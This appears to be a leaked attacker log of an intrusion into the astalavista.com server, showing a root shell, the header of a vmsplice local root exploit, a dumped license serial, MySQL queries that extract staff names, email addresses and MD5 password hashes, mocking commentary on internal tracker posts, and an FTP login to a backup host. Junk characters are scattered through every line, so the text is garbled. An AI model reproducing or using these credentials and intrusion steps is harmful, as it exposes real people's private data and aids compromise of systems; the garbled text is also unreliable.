-rw-r–r– 1 root root 2419504 Sep 28 2007 backup.sql
, z# C- Y$ q4 q; B( [drwxr-xr-x 2 com com 4096 May 12 15:20 backup_system
, C, L( o! ^, ?2 \3 H" t# _7 a-rw——- 1 com com 21880 Jun 2 08:07 .bash_history
" C5 k/ s. J# N-rw-r–r– 1 com com 24 Sep 24 2007 .bash_logout0 y+ ^& L. Z# l% _$ k- A
-rw-r–r– 1 com com 176 Sep 24 2007 .bash_profile+ _& J _0 r1 R
-rw-r–r– 1 com com 124 Sep 24 2007 .bashrc7 s* {8 q" ?2 t1 Q4 f/ v, ^* d+ N& E
drwx–x–x 3 com com 4096 Jan 29 2008 domains
5 l" q9 i6 D& \% `% t-rw-r–r– 1 com com 16409 Jul 16 2008 FWUser.class.php.fixed5 @$ @4 [% |: w. k# d* J
drwxrwx— 3 com mail 4096 Jan 6 19:24 imap% I! _7 Z. J4 ?6 g+ U
-rw——- 1 com com 69 Nov 18 2008 .lesshst
: P$ O) [, W# e+ |/ M7 udrwx—— 2 com com 4096 Sep 24 2007 mail- k) M, _! z7 c& ]3 _6 A1 w
-rw——- 1 com com 13970 Mar 28 21:42 .mysql_history" I, ~& B% Z1 ?# F, m% P' i8 v
drwxr-xr-x 2 com com 4096 Aug 20 2008 .ncftp
O4 L3 Z* H+ m2 B* ^7 I/ Blrwxrwxrwx 1 com com 37 Sep 24 2007 public_html -> ./domains/astalavista.com/public_html: C, f/ N6 O- I6 J7 q" P
-rw-r—– 1 com mail 34 Sep 24 2007 .shadow& d0 f+ Q* Q2 T% r: F1 I; d5 k& g
drwx—— 2 com com 4096 Aug 26 2008 .ssh; k- P7 l& g: I9 ^
-rwx—— 1 com com 8515 Feb 10 2008 t
7 X9 G8 @, {( h/ {5 _4 |1 M, K; b( e-rw-rw-r– 1 com com 6265 Feb 11 2008 t.c
- t( i( v: T( fdrwxrwxr-x 2 com com 4096 Jan 30 15:47 tmp
2 u7 t8 v' q" Y' ^6 v& N# K' W$ Q-rw-rw-r– 1 com com 617 May 20 2008 .toprc
2 l) H' I7 I; ]5 Y* h6 ]-rw-rw-r– 1 com com 141851766 May 19 2008 version2-backup-20080519-0900.sql
+ B2 V' I& v+ C2 B' F+ T-rw——- 1 com com 16629 Mar 28 21:46 .viminfo
4 W" l/ m& w' i" o-rw-rw-r– 1 com com 51 Aug 25 2008 .vimrc O9 F+ v6 [: u3 K+ U
! u) O) w+ j/ p. d# I7 A5 b' _sh-3.2# head t.c
# [0 F/ H- N( n# `/*
" Y3 y" G& c, q* X% s; l$ m5 D* jessica_biel_naked_in_my_bed.c# q: ~7 J: e1 L9 ?' i& c7 |
*5 w, P- D& X( h$ `/ u
* Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.$ t( [: v, U& {/ X. g! [
* Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.( W/ |1 a+ U( i
* Stejnak je to stare jak cyp a aj jakesyk rozbite.
; T2 Y" o. \4 O" p; K+ G*3 Z0 i5 Y: t6 d
* Linux vmsplice Local Root Exploit) ?: O/ e2 W: k4 q, _0 K2 h
* By qaaz/ J6 S% P1 n5 y9 H* Q6 e3 r L5 N6 \
*0 e( o( H1 Y$ V, ? n
2 s. p, a$ E" G) h4 dsh-3.2# cd /
: U2 R' {4 m! a T* D6 J/ Bsh-3.2# ls -la
! Y! `& X9 h$ u: C! Ttotal 360& a9 w) g( K( h F
drwxr-xr-x 25 root root 4096 Jun 3 02:43 .
& f! e! `9 h% {7 ^5 K" N7 Pdrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
. `; h! L) G4 V: } N- H- I( S-rw——- 1 root root 10240 Jun 3 02:39 aquota.group
/ x3 |* A$ p+ H0 C-rw——- 1 root root 10240 Jun 3 02:39 aquota.user% r/ G4 T. n8 |* f4 m
-rw-r—– 1 root root 819 Jul 17 2008 astalavista.us.db o* \( l; h. `9 ?) T. R5 P# t& L
-rw-r–r– 1 root root 0 Jun 3 02:43 .autofsck
' P# ?( w# d" k+ ]7 ^8 p-rw-r–r– 1 root root 0 Sep 16 2007 .autorelabel1 l" _2 `, w9 A1 l. E
drwxr-xr-x 3 root root 4096 Dec 29 2007 backup
* Z) J6 b; _: P3 d* ~% V) k. \drwxr-xr-x 2 root root 4096 Jun 4 04:03 bin
}3 N/ T' p( X2 j. Zdrwxr-xr-x 5 root root 4096 Jun 2 14:06 boot& ?! z6 @( f( p7 [% r9 Q
drwxr-xr-x 11 root root 3620 Jun 3 02:43 dev( ^% q, E3 |2 ]* c6 a, k7 h. a
drwxr-xr-x 84 root root 12288 Jun 4 03:16 etc
3 w; L# e8 P% c- P, ddrwxr-xr-x 14 root root 4096 Mar 11 17:56 home
& ?6 i8 H# f/ w-rw-r–r– 1 root root 13387 Mar 20 2008 httpd.conf }8 f/ |: z9 s* f3 u3 m" N
drwxr-xr-x 11 root root 4096 Jun 4 04:02 lib& J- a* V# n" c& k0 _9 M( u
drwxr-xr-x 7 root root 4096 Jun 4 04:03 lib64; s! _8 A# N8 `( U
drwx—— 2 root root 16384 Sep 11 2007 lost+found
) n. F! m: \9 r, G7 v+ L/ ldrwxr-xr-x 2 root root 4096 Mar 11 17:56 media
& C7 z6 c# R' W; kdrwxr-xr-x 2 root root 0 Jun 3 02:43 misc% N: ?% Q& b4 Z* y1 y% f
drwxr-xr-x 2 root root 4096 Mar 11 17:56 mnt1 a2 U/ Q# \. T
-rw-r–r– 1 root root 5859 Feb 3 2008 mrtg.cfg
8 X: O8 W! ~ [) H5 v" E4 e6 T9 bdrwxr-xr-x 2 root root 0 Jun 3 02:43 net, J( P* v7 [, x2 y5 V8 a
drwxr-xr-x 3 root root 4096 Mar 11 17:56 opt6 ` ]' f( B/ u4 a
dr-xr-xr-x 264 root root 0 Jun 3 02:42 proc
. r( g0 P" v9 b1 Pdrwxr-x— 15 root root 4096 Jun 4 08:40 root% u4 b4 ]' U/ |! y
drwxr-xr-x 2 root root 12288 Jun 4 04:03 sbin1 R- N# n8 l. `% K" W/ e
drwxr-xr-x 2 root root 4096 Mar 11 17:56 selinux6 E8 l- X7 K( a; @5 I
drwxr-xr-x 2 root root 4096 Mar 11 17:56 srv# X4 @* U! O7 H8 j/ C1 @" A0 g9 F
drwxr-xr-x 11 root root 0 Jun 3 02:42 sys
& h. J& q9 D# Pdrwxrwxrwt 4 root root 122880 Jun 4 10:35 tmp: E3 a* Q2 j% @! k
drwxr-xr-x 16 root root 4096 Jun 2 13:56 usr& b/ S! Y' C9 d+ V3 L/ D* b
drwxr-xr-x 26 root root 4096 Jun 4 03:16 var: ~' Z6 R6 j# ^+ r
/ N( |$ b$ w! Z- @, u! u# |, |sh-3.2# cd opt6 p/ a" y8 i ^4 ^
sh-3.2# ls -la9 y/ j" o5 m6 E
total 20
) |% h. c7 t9 {! x! B9 u8 Idrwxr-xr-x 3 root root 4096 Mar 11 17:56 .! Q; V2 y/ \6 W: \' H- l, l; q. w
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..4 l) A+ B {% P% B$ c4 f
drwxr-xr-x 15 root root 4096 Mar 20 2008 lsws
& m+ ~* n) G6 q$ p$ V( p( k, g; s5 \2 z- Q
sh-3.2# cd lsws/
7 A; e. f! L. q h5 _sh-3.2# ls -la
+ q4 `: u. b* Z6 V |2 a. W( ptotal 1081 \& ~ y! s) a& e6 Q
drwxr-xr-x 15 root root 4096 Mar 20 2008 .
% F. g9 ?7 \# Z' G9 k& \/ Hdrwxr-xr-x 3 root root 4096 Mar 11 17:56 ..) M. p3 `. h& Q
drwxr-xr-x 8 root root 4096 Mar 20 2008 add-ons, Q2 {# k5 g# ?. Q0 B9 ^
drwxr-xr-x 13 root root 4096 May 29 15:10 admin6 f- C$ y% |4 s$ }2 T- P2 A
drwxr-xr-x 5 apache apache 4096 May 29 15:10 autoupdate& ~. q# l8 W" a8 _. U
drwxr-xr-x 2 root root 4096 May 29 15:10 bin
2 {( c" _$ a' n P0 u: E: Q( fdrwx—— 4 apache apache 4096 Jun 3 02:43 conf
( F& w, i% F( a/ fdrwxr-xr-x 7 apache apache 4096 Mar 20 2008 DEFAULT
) w: z7 d% y7 @& ?% N3 D& A% l, w5 b Hdrwxr-xr-x 2 root root 4096 Sep 15 2008 docs
0 M' {+ E* r1 ndrwxr-xr-x 2 root root 4096 May 29 15:10 fcgi-bin
% O5 l7 S% S0 \4 S0 @0 Q$ Mdrwxr-xr-x 2 root root 4096 Sep 15 2008 lib
B: k9 \" j0 |% d. j9 ~" R-rw-r–r– 1 root root 6959 May 29 15:10 LICENSE
7 H1 b E+ ~' u7 X* M- {, T7 t-rw-r–r– 1 root root 2214 May 29 15:10 LICENSE.OpenLDAP/ o# R/ i, p- q& ^& ]( t* G0 Z. X
-rw-r–r– 1 root root 6279 May 29 15:10 LICENSE.OpenSSL5 m! O) w2 ]! k" {- S1 O
-rw-r–r– 1 root root 3208 May 29 15:10 LICENSE.PHP9 c6 a% V9 W1 k( s
drwxr-xr-x 2 root root 20480 Jun 4 09:55 logs
% x# X0 L* }) h) j7 idrwxr-xr-x 2 root root 4096 Mar 20 2008 php9 h2 W1 \0 i1 C
drwx—— 2 apache apache 4096 Mar 20 2008 phpbuild. A! e1 @/ ]1 m2 m
drwxr-xr-x 3 root root 4096 Mar 20 2008 share# p5 s8 K5 T9 G- |7 A- {- Q t
-rw-r–r– 1 root root 6 May 29 15:10 VERSION
: {& x1 a0 K. p. x+ i5 ]0 d/ v9 Y, ~ M
sh-3.2# cd conf2 p% D4 V3 |9 ^/ E, T5 d: s
sh-3.2# ls -la! c$ P, u9 e X2 y$ ] D& l
total 48
! \8 h( {; K, A' x% o: q$ b. pdrwx—— 4 apache apache 4096 Jun 3 02:43 .
) w* J% u$ A* e. `' N9 x7 Tdrwxr-xr-x 15 root root 4096 Mar 20 2008 ..( k9 x* w: s% u5 b8 B. H: S
drwx—— 2 apache apache 4096 Mar 20 2008 cert; n3 y5 G2 j$ S* @ Y0 _
-rw-r–r– 1 apache apache 6668 May 29 15:13 httpd_config.xml
5 O- a1 O# T! [4 ]* R( D/ V-rw——- 1 apache apache 6613 May 27 18:33 httpd_config.xml.bak( Y1 M' T% O" l0 i; H
-rw-r–r– 1 root apache 0 Jun 3 14:11 .last _% q' M% \0 f2 `7 D
-rw——- 1 apache apache 256 May 29 15:10 license.key
: u* v2 \& J$ C% Z/ _( m-rw——- 1 apache apache 256 Mar 21 2008 license.key.old
6 v8 D2 v4 K R9 L-rw——- 1 apache apache 3320 Mar 20 2008 mime.properties) o2 r5 [! Q) x! p' r
-rw——- 1 apache apache 20 May 29 15:10 serial.no3 v: e8 ~9 Y4 O) G" u3 r2 h3 N
drwx—— 2 apache apache 4096 Mar 20 2008 templates3 C; K* X' f8 X7 v6 g1 y8 j9 B
5 X( w* L4 ]! H( v: D7 q8 s
sh-3.2# cat serial.no
2 n+ `6 ]5 r/ Q( [IbDl-oVsO-CKqL-wVRa
5 R. w, R; K$ p5 f1 I8 W, t" v: n3 m! l6 F9 z, f U
sh-3.2# mysql6 G- P# Q* z" l [; l2 U) A( A
Welcome to the MySQL monitor. Commands end with ; or \g.
9 M! T/ K5 i& b9 o. hYour MySQL connection id is 286844& {' o0 q9 U: L, v7 k% f
Server version: 5.0.45-community-log MySQL Community Edition (GPL)' _( j7 ` e, \# Y
: b, `, B1 M) \' gType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
8 b3 k2 ?; L& J/ O, o7 Y5 p y/ s! a2 X' R3 Z* m$ m* \7 ]
mysql> show databases;
# B5 `# W. G; F( O- t" W+———————–+
5 r* y5 V! T/ R, g: l. D/ ^| Database |
6 N2 J9 [) s# Z7 \. [+———————–+& R) }% p/ ^+ m5 _9 z T+ a9 q, J
| information_schema |
' _$ v. i2 e" V5 \6 }6 f| astanet_ads |
1 F- S4 b% k* C) A| astanet_mailing_lists |3 P4 l8 n2 g. N9 w+ ?* r. v
| astanet_mediawiki |
2 a, i$ S* O% M# ?$ E| astanet_membersystem |) [/ y$ r# ^7 \ U3 c+ Y" L
| com_contrexx |: W: B' ~& Y6 t( c% U
| com_contrexx2 |
: p# S. H7 k8 @4 ]$ Z6 O* c: R| com_contrexx2_live |
8 d; n7 d/ n. W) p# X' d| da_roundcube |
. u- I1 ~ i/ u* u. j| dolphin |
! h9 I% ~" Q8 D/ O$ o- t1 r$ C1 m| ideapool |
& ~' H+ t6 e' L+ E| mysql |$ o n" T6 M$ d5 ~% h" m5 v/ d ^
| test |
, I x/ Y1 g' X9 W$ D' H- k; Y| yourmaster |0 x% P+ e$ i/ _/ ]( u+ d3 k1 T
+———————–++ Y- q3 S. C( A. v3 D q
14 rows in set (0.00 sec)2 Q& A4 ~$ t! I: h. O0 F
7 _ S- g+ ~' f' |
mysql> use ideapool5 Y2 A& C2 L8 V) q0 O" s
Database changed0 I+ J) y! E$ ~" g
mysql> show tables;8 u) e. I$ H' B, n( G
+———————————–+
: `$ s! J0 l' z% \| Tables_in_ideapool |* X4 Q7 o/ k/ u' ~: m; T
+———————————–+- r! p L( O4 E6 b) D
| eventum_columns_to_display |
$ P2 R) [# {" m4 k| eventum_custom_field |
& N: X; O B$ K$ g, U- K, ]| eventum_custom_field_option |7 F6 W$ }* y$ ]$ l( ?
| eventum_custom_filter |+ l( k/ ^" ?/ D/ @8 F* F0 ^
| eventum_customer_account_manager |9 J$ w: B8 U! Y0 i) |
| eventum_customer_note |8 N7 ?5 A: J) k, s$ g# \* h
| eventum_email_account |: ^( r2 N4 V1 N( W6 F; O1 J
| eventum_email_draft |% K( [4 s0 ?8 `2 L
| eventum_email_draft_recipient |: b2 _+ s+ v) Q8 V5 A
| eventum_email_response |
I+ R3 `, z" D' F/ _! T1 || eventum_faq |7 x. c6 I. K Q9 a6 o, B
| eventum_faq_support_level |
$ {1 J! C$ ]) a6 G1 X" Q# G9 q| eventum_group |
/ w! m( f* z6 J& P6 S2 j: J# X| eventum_history_type |. z5 c# }1 u9 ^/ |. t4 k- t
| eventum_irc_notice |
8 ^. `3 n: d1 X: a* |" s| eventum_issue |
& ~/ A1 C+ G8 P" r| eventum_issue_association |
7 \- {$ T$ y, ~' \ L+ L| eventum_issue_attachment |
: a! i8 A0 h1 v| eventum_issue_attachment_file |
8 M. ]3 E( Y9 z/ K! V% M( z| eventum_issue_checkin |
, m" D+ m# |$ d# j: f2 L| eventum_issue_custom_field |) h. A8 _( k) U5 [
| eventum_issue_history |
8 J" q* \9 W* W2 x! p2 m| eventum_issue_quarantine |
4 I @8 v1 g6 \( H2 q9 }| eventum_issue_requirement |9 B8 ?; i6 {% l( ]& r5 V# W' T
| eventum_issue_user |) ^0 i& N( h! Z J; ~. q
| eventum_issue_user_replier |! w: Y$ _# g9 ?9 t) H8 U4 c
| eventum_link_filter |
, M v) Y" R* o+ P" p| eventum_mail_queue |
# [# |1 c9 v' N2 P| eventum_mail_queue_log |
; V) k1 t* Y: x% t# q- ~! ]2 F: L| eventum_news |
+ a2 K- ?' u- d \1 i| eventum_note |" p8 a/ r" B. ~! S# H
| eventum_phone_support | M6 b( G$ L# }" ]! A5 a* k
| eventum_project |
8 s6 {$ y( F4 P4 h| eventum_project_category |: N. d% x- @1 P1 G3 }$ r) ]
| eventum_project_custom_field |/ ]. {) c) H; { M! P
| eventum_project_email_response |
, ~! l& x* \* g8 V2 ~) || eventum_project_field_display |/ m1 `$ j) |! @
| eventum_project_group |6 F7 C! R! p0 v4 ~" r
| eventum_project_link_filter |
7 c9 F& P; q7 C| eventum_project_news |
" h3 ?4 N' I/ D5 S3 d4 ?| eventum_project_phone_category |
; g+ J2 ^' x% U" H| eventum_project_priority |6 H/ v" {3 Q+ t6 ~8 x7 c# v
| eventum_project_release |3 C3 K8 _- F* F6 H, C+ {* h/ l2 E
| eventum_project_round_robin |# @& l+ g$ G3 X2 P* a0 _
| eventum_project_status |
* i" x: M- W$ L/ [| eventum_project_status_date |) M% b5 ^! ]" `2 U; P
| eventum_project_user |; W7 Y' i' O( l9 M" |
| eventum_reminder_action |9 ~$ r$ }: J! p% R& }& i
| eventum_reminder_action_list |
) B4 x; ]/ p) g6 T% ^9 C- n| eventum_reminder_action_type |
# S1 J# g8 A6 G' a; R2 ~" Y| eventum_reminder_field |
r" _+ i1 |0 C$ b. l* ?| eventum_reminder_history |
! c4 s3 d. l) Q: k ^5 z1 g| eventum_reminder_level | p0 q5 U( S3 C2 H G; X! r
| eventum_reminder_level_condition |
; P' ?% @% A" P| eventum_reminder_operator |
" ?' ]& { ?" K, k| eventum_reminder_priority |8 S- ~/ c9 B% G1 V! r; S" `
| eventum_reminder_requirement |3 t& O( |/ R5 ^9 t7 ^4 j
| eventum_reminder_triggered_action |7 K7 z& o, |) ^
| eventum_resolution |& O0 C9 h- k. e/ k* P+ m
| eventum_round_robin_user |
. y, g% F+ B; k& G( p0 a| eventum_search_profile |# T8 I. ?- _6 {$ x3 Y) N
| eventum_status |
/ z% N% r E+ z, ^- n4 J| eventum_subscription |
5 T' e M% X G| eventum_subscription_type |" i0 w' E9 B% E
| eventum_support_email |1 }3 f9 X8 a- g# g
| eventum_support_email_body |: S2 v3 u' o0 q2 _
| eventum_time_tracking |
( r6 w& E- X9 ~; @$ N| eventum_time_tracking_category |+ C; X$ Q+ T% J6 e, F$ [
| eventum_user |
8 n+ x$ @9 \ ~( R+———————————–+
0 b& E2 Y1 `; w7 F: O# ~1 K69 rows in set (0.00 sec) A& r9 @# v8 g' ?
$ D( F7 }3 K* zmysql> describe eventum_user;
6 J7 ~# J9 B8 e. _+————————-+——————+——+—–+———————+—————-+! Z2 E! k' |$ A4 n, B
| Field | Type | Null | Key | Default | Extra |
1 x! u( i- C/ {) H% L& h+————————-+——————+——+—–+———————+—————-+% G1 U' c% L y( Z! U) R. S2 ]% ~
| usr_id | int(11) unsigned | NO | PRI | NULL | auto_increment |
! k) M: V4 }( S| usr_grp_id | int(11) unsigned | YES | MUL | NULL | |
9 [) ]+ o8 w, L! ^5 W; L1 S3 X| usr_customer_id | int(11) unsigned | YES | | NULL | |
1 r$ W ~. R+ a7 n: }3 D6 P# t| usr_customer_contact_id | int(11) unsigned | YES | | NULL | |
" w# H5 \2 B6 j& W/ x| usr_created_date | datetime | NO | | 0000-00-00 00:00:00 | |
. t% l5 y, n8 [$ R| usr_status | varchar(8) | NO | | active | |
$ [, {: B" [0 N4 D' N2 E2 [| usr_password | varchar(32) | NO | | | |" Y! Z( o+ x+ t8 I# R6 p7 k9 [9 I
| usr_full_name | varchar(255) | NO | | | |
( o& f* `2 W E. T| usr_email | varchar(255) | NO | UNI | | |( c/ `! |# {4 R
| usr_preferences | longtext | YES | | NULL | |: T3 L! F; }: A* [, y. p2 Q
| usr_sms_email | varchar(255) | YES | | NULL | |
9 X3 z2 W! B" y- o| usr_clocked_in | tinyint(1) | YES | | 0 | |
: o) V# p% z5 j+ R| usr_lang | varchar(5) | YES | | NULL | |7 V# x3 H$ X+ E# ~0 Q% J4 [
+————————-+——————+——+—–+———————+—————-+
3 H( s3 x0 ~: Y) t% ^- `$ [13 rows in set (0.00 sec)# P2 f' e0 u+ O) m! M$ s
5 u0 h7 N4 d* Z: f$ d' w- B, J! l! w
mysql> select usr_full_name,usr_email,usr_password from eventum_user;+ W, R! ?7 b0 c; Y! H& i) ^
+———————-+——————————-+———————————-+: N# L9 t R, @; I6 n, ~& Y$ \
| usr_full_name | usr_email | usr_password | ]; p5 c2 I! x2 j0 C4 q! U
+———————-+——————————-+———————————-+, w3 S. W1 b2 D7 \
| system | 链接标记system-account@example.com | 14589714398751513457adf349173434 |) _8 a$ }. A( O7 y2 c2 d' G3 _
| Developer (Paulo) | 链接标记paulo.santos@astalavista.ch | 26a35a1cf8895c27fb37ef4cf149f7bb |8 m0 n" |7 E; E( ?
| Be1er0ph0r | 链接标记be1er0ph0r@gmx.de | 229766dc0ca1fb67160a8782321dfdce |
/ j8 D" [5 H5 F8 ^| Admin | 链接标记pascal.mittner@astalavista.ch | 57c2877c1d84c4b49f3289657deca65c |
2 H: I- Q% n0 O| ADMIN | 链接标记admin@astalavista.ch | f6fdffe48c908deb0f4c3bd36c032e72 |/ Y) a5 I/ ?9 N7 T s' R
| USER | 链接标记user@astalavista.ch | 5cc32e366c87c4cb49e4309b75f57d64 |' z5 v, N+ V) v E5 L2 s
| Glafkos - (nowayout) | 链接标记glafkos@astalavista.com | f7735ab119023a8abb2301e67f81cd67 |
- }4 _" T5 Y2 R% h H6 j! u| Joao | 链接标记joao.pontes@astalavista.net | f805c071d7c823b937448c54c047b9fd |
% o8 D% `- S. H* ]0 K9 b| Pascal | 链接标记pm@astalavista.ch | e10adc3949ba59abbe56e057f20f883e |
# W/ y& ?3 I9 `& h| commander | 链接标记commander@astalavista.com | 932cd250918f881d41feb0b93883a926 |
0 L2 E( A6 ^! V+ |9 g| ishtus | 链接标记ishtus@astalavista.com | a587ffc88b3dbbba3fd2fe67af649ff0 |
2 G2 L! ]1 r/ F. {% j7 X9 [. b| sykadul | 链接标记sykadul@astalavista.com | 20224a2f3eeb57a13a10b4df543c128e |
% v1 | m. u! k8 y3 w| Zach McElroy | 链接标记admin@badfoo.net | 33c5d4954da881814420f3ba39772644 |$ M6 \) b2 U+ }; _
| usb | 链接标记usbenigma@hushmail.com | b513f22c3db6932855ad732f5f8a10a2 |2 W2 F3 L) T8 }- L9 \' u) j
| cyph3r | 链接标记cyph3r@astalavista.com | 6e1e50017a945e874d52ec91f9ab2cee |
1 a1 L# i8 [1 V$ t( i6 J4 o+———————-+——————————-+———————————-+, l. q' D& Z* x
15 rows in set (0.00 sec)3 \: z9 ]. C- o6 A& d4 k3 T
8 [6 Y# j, Y3 k" _3 p6 B) W: imysql> select iss_description from eventum_issue where iss_id = 43;
4 t# c4 k9 U1 W8 {* H' ?+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
9 |. k; O6 r, G( N3 N) ~| iss_description ; P6 Y' n4 m; ?2 b9 v. r9 f
|
2 G* ^ [5 f: Y" O+ S/ L+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+) N$ J) d+ B+ `/ A9 f! l
| Ok guys, to boost our traffic and revenue what we have to do is keep users logged in… how to do that? well think about it… if a user is watching a movie… he’ll be& I, W; ~: ?/ H" ?" e: a
connected for 90 mins… 120mins… so what i propose is something like:
1 z$ I2 v3 b$ y# k链接标记[url]http://www.surfthechannel.com/[/url]' z. M7 o8 o3 h. }* a
since they only provide LINKS to the movies they are LEGAL and don’t break DMCA rules… so we could do the same… “iframe” the content on our website or use a system6 W; h, T I# f$ Y. S; F% t, t7 Q
like podcast that uses our own flash player to stream content from other places, therefore the content NOT BEING HOSTED ON OUR SERVERS but only viewed… which doesn’t$ j2 o( W0 ~$ n& O+ X: E7 l, s( B
break any laws as far as i am aware (we should research on that just to be sure though!) Of course we would have to provide users with the button to take the content off
( w+ N o( M Q" K5 J: f9 C& Nif they think it breaks copyright laws and we will remove it… i think that makes it on the border of DMCA…+ |# T, D: G5 V; J+ w& N
) {: l, C$ S$ l: ^
We could also put advertisement during play on the flash video player itself… extra $$…
2 {2 {5 W N1 V. p, {) R$ F& o
|9 e# R: M6 ^4 V0 qBy sykadul |0 z) @9 N: ~ B7 }3 Q
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+ O1 Y. i. A& I( M2 N% F
1 row in set (0.00 sec)7 g6 o4 ]( }9 l( V8 Y
7 a: L4 m- l% ~$ W" L8 l; A+ F// Money and extra $$ is all they care about. remember that.
( u8 |, |" I: Q. V8 G
3 r+ t, H- r8 s; Emysql> select iss_summary,iss_description from eventum_issue where iss_id =42;' P, S$ {) ?0 I. D) J! G
+————————+——————————————————————————————————————————————————————————————————————————————-+9 b3 I. m D% `0 D; a
| iss_summary | iss_description ) g2 T3 `2 K. Z, z5 E1 Q
|% I( O t3 ?) P2 I/ `5 X
+————————+——————————————————————————————————————————————————————————————————————————————-+
; f3 s3 t! v4 o o2 X( w B5 x, f- b| Forum for REAL EXPERTS | Hello,
! [' i$ l2 W. p3 a, E
( L0 z& ^( q6 DIshtus and I,
. {/ W- o- w1 \ b# }
# ?) `; w) Y, W4 ICame up with a crazy and very workable and professional idea. We create an invitation only forum with the BEST security experts worldwide+ {* C2 Z# m1 I
ONLY. Security Experts from Bugtraq lists, exploit writters, reverse engineers etc..
3 [/ K1 z3 s7 I) Q: m, F/ T* u g' w! G8 \0 x
One example a friend of mine from coresecurity.com!
+ n& l" T( Y8 A7 f+ D% f% w, r% K( h
We could have big projects etc.. and we can work all together to bring to the security community exploits, open source software etc..6 Y2 U8 `3 O4 N5 f1 A
$ ~+ }3 [% D! ~7 r
|2 E1 J3 {! `' R- V* V
+————————+——————————————————————————————————————————————————————————————————————————————+% x+ e, i+ s- K8 C) e$ h
1 row in set (0.00 sec)
* ~9 Q$ @8 f: F* P4 t" C- D
) I1 K: Z- }$ f// What an awesome yet original idea Ishtus and him… bring MORE security “experts”, thats exactly what the world needs…
; a* ~" v# M7 Y! z! W* O, }& R: M& C" l/ @( K
mysql> select iss_summary,iss_description from eventum_issue where iss_id = 16;
2 [5 t8 T$ h2 w2 {7 L+——————+———————————————————————————————+
- G) g% o$ h* ?8 M& H' w| iss_summary | iss_description |
3 Y# }4 ?- u- b8 d+——————+———————————————————————————————+
* K5 s& |$ N: Q1 I$ D( N3 ], ~| Website guidance | Virtual Girl which guides you trought the website.
' I+ e$ G2 S. C1 _5 h# I) c: @/ Z$ X0 C
We need a girl with who you can ( talk )!!!3 R/ p" H1 J7 R* u+ P
Also for the News!' S. ^, z; C1 H( l3 r6 b4 j: D) z
So my suggestion is a girl who read you the news loud if you like!
1 t: I% @2 y- H$ _4 I/ Eyou can choose between read yourselfe or she read it for you or both!
) R& f. _ u5 {. b) q9 P
' ` F' D7 p5 D9 [9 @8 {' n9 eGo to 链接标记[url]www.heise.de[/url]! There is an example for Voice News! It’s a good thing!!!
` q e) [- f( h. v# v0 t
+ V% J8 Y0 r8 r3 X Y* CHave a look on the example girls!!
. _5 Y+ q7 @' a. ?0 N# z. v6 [% I
链接标记[url]http://www.yaoti.com/de/free_yaoti.html[/url]
; z w2 J* j" P4 y' m4 ]: B% E/ }- v# A9 C6 H
or that; k. |# y$ D, h4 `3 x3 l! }7 C
( ?: e: ^; B4 v
链接标记[url]http://www.yellostrom.de/[/url]
6 \1 t8 ^ x+ g6 y& Y6 @$ K' X. O8 P: D* I7 M3 E9 G1 p+ W7 ~/ K
|/ F" f0 k1 J. m( ^/ C
+——————+———————————————————————————————+
# B* F# \; a# ]6 q$ e1 z' J1 row in set (0.00 sec)
4 V) I) r& A* I Q' w6 m! K
/ G T5 ^% ]0 n& w' d* ^// ha ha.
1 p5 j' A0 a- \5 e1 v( R9 D. {; I/ D$ l4 Y
mysql> select iss_summary,iss_description from eventum_issue where iss_id = 7;
9 l: A" q& n& t, b/ ?$ Y0 }( [6 s+————————–+———————————————————————————————————–+
8 I n& Z% t. F/ }6 T| iss_summary | iss_description |
- U8 Z6 X. V- w4 ]$ g, Y! N( b+————————–+———————————————————————————————————–+
7 M$ y/ s5 L5 }7 B# S| Exploit Development Team | We need an exploit development team to focus on exploit research and publication under Astalavista name. |; T5 a" G+ M+ J% v7 I! Q
+————————–+———————————————————————————————————–+
6 y/ @: K1 M$ k6 C" V1 row in set (0.00 sec)
- R1 R+ G* ^+ }2 H
% T" {, U7 ~5 J3 V: G5 _8 Q* z// LOL.
$ ]3 F$ r2 D' W, x( J' ^+ R" Z$ {0 y! m3 l
mysql> exit
0 P! A/ _* r, HBye
. s2 I9 l, m! u6 Y9 p* x
; x3 \0 k5 A/ Q3 }6 Y3 Y4 A4 wsh-3.2# ftp 212.254.194.163% s; e% ~& Y# g9 _% r
Connected to 212.254.194.163.
. p) H( Q0 m! m) S; P! X. E7 g220 BackupCOM_VW FTP server ready.% j& ~. q& A! W5 u. c
504 AUTH: security mechanism ‘GSSAPI’ not supported., w) V/ A* f. N: F5 S
504 AUTH: security mechanism ‘KERBEROS_V4′ not supported.2 v* ^% A4 n' x) f) z
KERBEROS_V4 rejected as an authentication type9 p$ {% Z: R, ^9 s* g1 n5 T, A
Name (212.254.194.163:root): astalavista.com
- V/ o4 I" U3 l; h# L4 D/ X' c331 Password required for astalavista.com.
! d/ g7 J# g$ a' v) \1 A% qPassword:
. E4 h2 q8 W0 O! y2 u7 I2 }230 User astalavista.com logged in.* } V K! e4 O G7 }( E
Remote system type is UNIX.
T: ?- d( w1 s( xUsing binary mode to transfer files.
4 W7 t: f; b, O$ Q: |ftp> ls -la
9 N! I0 L* y0 b& B% q! f; @7 J1 N227 Entering Passive Mode (212,254,194,163,2,188)
2 W. s3 x3 B( p150 Opening BINARY mode data connection for ‘file list’.
1 o# ]1 M( ] }4 I" `dr-x—— 1 root users 4096 Jun 4 06:13 astalavista.com
& q* U* T2 Z% j: F0 D" U" y+ Q4 x226 Transfer complete.' U$ @6 y' V" G: t* f: h
ftp> cd astalavista.com( U1 ^+ L5 c1 }9 k( o) H- n R
250 CWD command successful.8 R& \; x& M( P* u. o5 n4 `
ftp> ls -la" l2 S( D3 R9 ^9 B+ @
227 Entering Passive Mode (212,254,194,163,2,189)4 d0 N. H. v) k4 c! Q; y O
150 Opening BINARY mode data connection for ‘file list’.
% @. o; ]$ X) c3 O, p7 S7 W-rw-rw-rw- 1 astalavista.com users 23410936878 Apr 29 22:10 09-04-28-astacom_full.tar; a4 D& t2 t4 F* ~% [0 b
